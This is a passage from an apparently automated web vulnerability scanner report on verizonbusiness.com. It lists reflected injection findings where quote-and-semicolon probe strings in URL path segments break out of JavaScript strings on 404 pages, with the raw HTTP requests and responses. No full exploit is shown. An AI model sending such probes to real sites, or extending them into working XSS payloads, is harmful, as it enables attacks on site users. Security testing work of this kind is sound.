Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products77697';7b5dd88adbe/communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.29. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3394a"%3bc776f339cc0 was submitted in the REST URL parameter 2. This input was echoed as 3394a";c776f339cc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications3394a"%3bc776f339cc0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications3394a";c776f339cc0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.30. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f05'%3b973ed6f0057 was submitted in the REST URL parameter 2. This input was echoed as a8f05';973ed6f0057 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsa8f05'%3b973ed6f0057/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsa8f05';973ed6f0057/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.31. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35c45"%3b3446886f3f4 was submitted in the REST URL parameter 1. This input was echoed as 35c45";3446886f3f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products35c45"%3b3446886f3f4/communications/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products35c45";3446886f3f4/communications/conferencing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.32. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efaf8'%3b0851e56f04c was submitted in the REST URL parameter 1. This input was echoed as efaf8';0851e56f04c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsefaf8'%3b0851e56f04c/communications/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsefaf8';0851e56f04c/communications/conferencing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.33. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4046a'%3bcd2d56fb13f was submitted in the REST URL parameter 2. This input was echoed as 4046a';cd2d56fb13f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications4046a'%3bcd2d56fb13f/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications4046a';cd2d56fb13f/conferencing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.34. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4625"%3b3f6eb6b4c4d was submitted in the REST URL parameter 2. This input was echoed as f4625";3f6eb6b4c4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsf4625"%3b3f6eb6b4c4d/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42339
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communicationsf4625";3f6eb6b4c4d/conferencing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.35. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fbd7'%3bf2b5ced80de was submitted in the REST URL parameter 3. This input was echoed as 4fbd7';f2b5ced80de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/conferencing4fbd7'%3bf2b5ced80de/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/conferencing4fbd7';f2b5ced80de/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.36. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58713"%3b215198f4b7 was submitted in the REST URL parameter 3. This input was echoed as 58713";215198f4b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/conferencing58713"%3b215198f4b7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43480
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/conferencing58713";215198f4b7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.37. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78cd5"%3b14faafd3cd7 was submitted in the REST URL parameter 1. This input was echoed as 78cd5";14faafd3cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products78cd5"%3b14faafd3cd7/communications/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products78cd5";14faafd3cd7/communications/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.38. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ab66'%3b124b3146f2 was submitted in the REST URL parameter 1. This input was echoed as 7ab66';124b3146f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7ab66'%3b124b3146f2/communications/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products7ab66';124b3146f2/communications/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.39. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a6b6'%3be97dc6b393c was submitted in the REST URL parameter 2. This input was echoed as 7a6b6';e97dc6b393c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications7a6b6'%3be97dc6b393c/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42341
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications7a6b6';e97dc6b393c/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.40. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e2bc"%3bdf2b6c45fef was submitted in the REST URL parameter 2. This input was echoed as 6e2bc";df2b6c45fef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications6e2bc"%3bdf2b6c45fef/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:55 GMT
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications6e2bc";df2b6c45fef/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.41. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e288'%3beb8b904ab32 was submitted in the REST URL parameter 3. This input was echoed as 9e288';eb8b904ab32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/contact-center9e288'%3beb8b904ab32/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
